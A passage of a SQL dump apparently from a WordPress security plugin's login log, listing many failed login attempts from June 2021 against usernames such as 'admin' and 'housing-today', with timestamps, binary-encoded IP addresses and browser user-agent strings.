like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(57,70,1624378038.222880,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h-��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(58,72,1624379924.212889,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0���Z��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(59,73,1624379925.660937,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���Z��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(60,74,1624381041.695793,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0���Z��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(61,75,1624381042.324251,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���Z��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(62,76,1624382165.698261,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0��gz','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(63,77,1624382169.962271,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��gz','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(64,78,1624383365.627670,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0���M]','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(65,79,1624383366.930709,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���M]','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(66,80,1624384490.437076,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0���y��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(67,81,1624384491.582226,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���y��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(68,82,1624385659.683438,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0����(','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(69,83,1624385659.973006,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����(','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(70,88,1624389275.047757,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0����f','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(71,89,1624389275.989403,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����f','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(72,90,1624390425.638310,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0���Dx1','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(73,91,1624390426.599562,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���Dx1','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(74,92,1624391238.039508,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��E��x','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(75,93,1624392885.642681,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"@�f','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(76,94,1624394682.256453,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(77,95,1624395247.322945,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0��N/u�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(78,96,1624395250.584213,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��N/u�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(79,101,1624396552.789091,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0��e\0{�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(80,102,1624396553.872109,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��e\0{�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(81,103,1624397803.990399,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(82,104,1624397805.361945,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(83,105,1624398430.088445,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���GY\\','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(84,109,1624401625.252387,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0���Y �','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(85,110,1624401625.889376,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Y �','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(86,111,1624402092.628561,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���,X#','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(87,112,1624402873.471416,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0��g�3�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(88,113,1624402874.616156,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��g�3�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(89,114,1624404080.537043,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0��e\0{�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(90,115,1624404081.671237,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��e\0{�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(91,116,1624404098.658251,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���Q֨','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(92,118,1624405346.563805,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0��\'a�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(93,119,1624405351.080392,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��\'a�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(94,120,1624406085.688076,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���cķ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(95,121,1624406720.478218,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0����u�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(96,122,1624406725.974711,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����u�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(97,123,1624407901.816797,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0���Y �','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(98,124,1624407903.163567,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���Y �','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(99,125,1624408202.296659,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����B�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(100,126,1624409084.389976,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0��3�H�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(101,127,1624409085.186384,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��3�H�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(102,128,1624410343.718830,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h-[�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(103,129,1624410345.373532,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h-[�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(104,130,1624410346.381459,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h-[�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(105,131,1624410348.243358,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h-[�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(106,132,1624410350.948546,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h-[�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(107,133,1624410353.071504,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h-[�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(108,134,1624410353.755256,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h-[�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(109,135,1624410354.510601,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h-[�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(110,136,1624410355.520804,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h-[�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(111,137,1624410356.624376,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h-[�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(112,138,1624410357.493037,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h-[�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(113,138,1624410357.628375,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h-[�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(114,139,1624410358.316752,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h-[�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(115,140,1624410358.968920,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h-[�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(116,141,1624410359.617995,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h-[�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(117,142,1624410360.139181,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h-[�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(118,143,1624410360.627870,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h-[�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(119,144,1624410360.969177,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h-[�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(120,145,1624410361.351855,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h-[�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0 Safari/537.36'),(121,147,1624410454.312066,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0��o��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(122,148,1624410455.682411,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��o��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(123,149,1624410465.512005,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����d','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(124,150,1624414294.588621,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0���\\z�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(125,151,1624414298.184468,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���\\z�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(126,152,1624414772.799171,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���]�P','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(127,153,1624415604.003608,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0��g�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(128,154,1624415605.855998,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��g�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(129,155,1624416471.623862,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0��>Ҵ�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36 OPR/32.0.1948.45'),(130,155,1624416471.683589,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0��>Ҵ�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36 OPR/32.0.1948.45'),(131,156,1624416844.770677,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0���ɠ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(132,157,1624416845.007533,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���ɠ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(133,158,1624417104.110958,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����p','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(134,159,1624418137.407270,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0��-��#','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(135,160,1624418138.094983,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��-��#','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(136,162,1624419392.703160,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0���b�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(137,163,1624419393.309696,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���b�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(138,164,1624420148.029715,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��h�-�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(139,165,1624420745.554675,1,'loginFailInvalidUsername','housing-today',0,'\0\0\0\0\0\0\0\0\0\0��ݏ0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(140,166,1624420747.338342,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��ݏ0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(141,167,1624421261.338803,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(142,168,1624421833.915980,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���q٤','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(143,169,1624422372.641945,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���ER','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(144,170,1624422546.730010,1,'loginFailInvalidUsername','ilariagaliano',0,'\0\0\0\0\0\0\0\0\0\0��>���','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(145,171,1624422546.875562,1,'loginFailInvalidUsername','ilariagaliano',0,'\0\0\0\0\0\0\0\0\0\0��>���','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(146,172,1624422547.050006,1,'loginFailInvalidUsername','ilariagaliano',0,'\0\0\0\0\0\0\0\0\0\0��>���','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(147,173,1624422547.267932,1,'loginFailInvalidUsername','ilariagaliano',0,'\0\0\0\0\0\0\0\0\0\0��>���','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(148,174,1624422547.465141,1,'loginFailInvalidUsername','ilariagaliano',0,'\0\0\0\0\0\0\0\0\0\0��>���','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(149,175,1624422547.650949,1,'loginFailInvalidUsername','ilariagaliano',0,'\0\0\0\0\0\0\0\0\0\0��>���','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(150,176,1624422547.844500,1,'loginFailInvalidUsername','ilariagaliano',0,'\0\0\0\0\0\0\0\0\0\0��>���','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(151,177,1624422547.992395,1,'loginFailInvalidUsername','ilariagaliano',0,'\0\0\0\0\0\0\0\0\0\0��>���','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(152,178,1624422548.226172,1,'loginFailInvalidUsername','ilariagaliano',0,'\0\0\0\0\0\0\0\0\0\0��>���','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(153,179,1624422548.459603,1,'loginFailInvalidUsername','ilariagaliano',0,'\0\0\0\0\0\0\0\0\0\0��>���','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(154,180,1624422548.665877,1,'loginFailInvalidUsername','ilariagaliano',0,'\0\0\0\0\0\0\0\0\0\0��>���','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(155,181,1624422548.808380,1,'loginFailInvalidUsername','ilariagaliano',0,'\0\0\0\0\0\0\0\0\0\0��>���','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(156,182,1624422549.015453,1,'loginFailInvalidUsername','ilariagaliano',0,'\0\0\0\0\0\0\0\0\0\0��>���','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(157,183,1624422549.167155,1,'loginFailInvalidUsername','ilariagaliano',0,'\0\0\0\0\0\0\0\0\0\0��>���','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(158,184,1624422549.419949,1,'loginFailInvalidUsername','ilariagaliano',0,'\0\0\0\0\0\0\0\0\0\0��>���','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(159,185,1624422549.590526,1,'loginFailInvalidUsername','ilariagaliano',0,'\0\0\0\0\0\0\0\0\0\0��>���','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(160,186,1624422549.817205,1,'loginFailInvalidUsername','ilariagaliano',0,'\0\0\0\0\0\0\0\0\0\0��>���','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(161,187,1624422550.034614,1,'loginFailInvalidUsername','ilariagaliano',0,'\0\0\0\0\0\0\0\0\0\0��>���','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(162,188,1624422550.351479,1,'loginFailInvalidUsername','ilariagaliano',0,'\0\0\0\0\0\0\0\0\0\0��>���','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(163,190,1624422892.135186,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;�u','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(164,191,1624423471.191042,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g8�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(165,192,1624424007.656995,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��C��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(166,193,1624424588.695875,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���#�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(167,194,1624425331.598478,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h�|�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(168,195,1624425824.720743,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3Kè','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(169,196,1624426419.925172,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(170,197,1624427044.051467,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��E��s','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(171,198,1624427665.449953,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��C��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(172,199,1624428324.064090,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(173,200,1624429053.012867,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���,X#','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(174,201,1624430415.521233,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����Y','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(175,202,1624431135.531708,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(176,203,1624431873.204598,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(177,204,1624432541.387677,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��H��s','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(178,205,1624433308.315293,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(179,206,1624434129.834730,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#��#','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(180,207,1624434861.038629,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��B!ͽ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 